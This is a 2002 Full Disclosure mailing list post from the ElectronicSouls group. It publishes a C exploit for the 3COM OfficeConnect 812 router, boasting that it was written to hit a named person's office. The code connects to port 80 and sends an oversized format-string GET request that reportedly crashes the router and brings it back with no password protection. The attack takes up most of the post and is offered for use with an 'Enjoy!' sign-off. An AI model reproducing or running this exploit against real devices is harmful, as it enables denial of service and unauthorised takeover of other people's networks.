Full Disclosure mailing list archives
[ElectronicSouls] - 3COM OfficeConnect 812 DoS
From: es () hush com
Date: Fri, 29 Nov 2002 12:44:15 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here's a little 0day we wrote to DoS the 3COM OfficeConnect, which is what BuRn-X uses at his office. After successful exploitation, the router will reboot, with no password protection. <EG>. # cat ES3comFsck.c /*********************************************************\ * !! ELECTRONIC-SOULS CREW ONLY !! * * !! - DO NOT DISTRIBUTE !! * * 3COM OfficeConnect 812 DoS * ..but hey this isnt just a dumb DoS, the router will restart * and be up without any password protection in like 2 mins ;) * (C) BrainStorm [ElectronicSouls] * \*********************************************************/ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #define BOLD "\033[00;01m" #define RED "\033[01;31m" #define NORM "\033[00;00m" #define GREEN "\033[01;32m" int main(int argc, char **argv[]) { struct sockaddr_in sin; struct hostent *host; char buf[8192]; int sock, rt, len; if (argc != 2) { printf(BOLD"[!] Usage: %s <host>\n"NORM,argv[0]); } host = gethostbyname((void *)argv[1]); sock = socket(AF_INET, SOCK_STREAM, 0); bzero(&(sin.sin_zero), 8); sin.sin_family = AF_INET; sin.sin_addr.s_addr = htonl(INADDR_ANY); sin.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr; sin.sin_port = htons(80); rt = connect(sock, (void *)&sin, sizeof(sin)); if (rt == -1) { perror(RED"[*] Connecting.."NORM); exit(1); } printf(GREEN"[!] Connected to %s\n"NORM, argv[1]); memset(&buf, 0, sizeof(buf)); sprintf(buf, "GET /graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s HTTP/1.0\n\n", argv[1]); printf(GREEN"[] Sending overflow string..\n"NORM, argv[1]); send(sock, buf, sizeof(buf), 0); while (1) { memset(&buf, 0, sizeof(buf)); len = sizeof(buf); rt = read(sock, &buf, len); if (rt <= 0) exit(0); printf(GREEN"%s\n"NORM, buf); } printf(NORM"\n"); } # Enjoy! The Electronic Souls Team [ElectronicSouls] (c) 2002 "<dvorak> probably is the real ES archive" -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3n0bIMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltY+oAoJitGRRel4HG O/tIwN1jR/bE1sjuAKC8APYsl658tT7L2f6SsfRaHuHQUw== =rq5Y -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - 3COM OfficeConnect 812 DoS es (Nov 29)